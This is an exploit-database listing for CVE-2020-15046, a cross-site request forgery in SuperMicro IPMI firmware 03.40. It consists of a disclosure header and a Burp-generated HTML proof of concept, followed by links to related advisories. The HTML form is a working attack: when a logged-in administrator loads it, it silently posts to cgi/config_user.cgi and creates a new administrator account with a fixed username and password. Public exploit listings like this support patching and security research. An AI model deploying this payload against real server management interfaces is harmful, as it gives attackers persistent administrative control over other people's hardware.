Lucene search
Metin Yunus Kandemir1337DAY-ID-34656HistoryJul 08, 2020 - 12:00 a.m.
SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin) Vulnerability
2020-07-0800:00:00
Metin Yunus Kandemir
0day.today
164
EPSS
0.005
Percentile
75.8%
Exploit for hardware platform in category web applications
# Exploit Title: SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.supermicro.com/
# Software Link: https://www.supermicro.com/en/solutions/management-software/bmc-resources
# Version: X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
# CVE: CVE-2020-15046
# Source: https://www.totalpentest.com/post/supermicro-ipmi-webgui-cross-site-request-forgery
# Description:
# The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and
# IPMI firmware 03.40
# allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to
add new admin users.
# The fixed versions are BIOS 3.2 and firmware 03.88.
# PoC :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST">
<input type="hidden" name="username" value="JOKER" />
<input type="hidden" name="original_username" value="2" />
<input type="hidden" name="password" value="onebadday" />
<input type="hidden" name="new_privilege" value="4" />
<input type="submit" value="submit request" />
</form>
</body>
</html>
# 0day.today [2020-07-20] #Related
cvelist
cvelist
CVE-2020-15046
2020-06-24 22:25:57
exploitdb
exploitdb
SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)
2020-07-15 00:00:00
SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin)
2020-07-08 00:00:00
nvd
nvd
CVE-2020-15046
2020-06-24 23:15:10
cve
cve
CVE-2020-15046
2020-06-24 23:15:10
prion
prion
Cross site request forgery (csrf)
2020-06-24 23:15:00
zdt
zdt
packetstorm
packetstorm
SuperMicro IPMI 03.40 Cross Site Request Forgery
2020-07-09 00:00:00